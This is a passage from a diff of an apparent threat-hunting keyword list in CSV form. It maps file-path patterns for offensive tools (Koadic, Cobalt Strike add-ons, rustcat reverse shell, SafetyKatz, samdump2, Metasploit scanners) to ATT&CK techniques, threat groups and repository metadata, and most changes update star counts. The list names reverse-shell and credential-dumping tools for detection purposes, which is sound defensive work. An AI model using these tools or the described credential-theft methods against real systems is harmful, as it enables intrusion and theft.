 "*/rundll32.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
 "*/rundll32_js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
 "*/RunOF/RunOF/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z"
 "*/runshellcode.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z"
 "*/RuralBishop.git*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z"
 "*/rusers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/rustcat/releases/latest/download/*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z"
 "*/rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z"
 "*/RustHound.git*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z"
-"*/rvrsh3ll/*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
+"*/rvrsh3ll/*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
 "*/RWXfinder.git*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z"
 "*/S3cur3Th1sSh1t/*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z"
-"*/S3Scanner.git*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
-"*/S4UTomato.git*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
+"*/S3Scanner.git*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
+"*/S4UTomato.git*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
 "*/s7-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/saefko.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z"
 "*/Safer_PoC_CVE*","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z"
 "*/SafetyKatz.git*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of 
slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" -"*/sam_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/sam_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/samba-vuln-cve-2012-1182.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/samdump.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/samdump2*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" -"*/samruser.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/sap_default.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/samruser.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/sap_default.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/sc_inject/inject/*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" -"*/scan4all.git*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*/scan4all/lib/api*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*/scan4all/lib/util*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*/scanner/discovery*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/scanner/kerberos*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/scanner/pcanywhere*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/scanner/portscan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/scanner/winrm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/scan4all.git*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/scan4all/lib/api*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/scan4all/lib/util*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" 
+"*/scanner/discovery*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/kerberos*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/pcanywhere*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/portscan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/winrm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
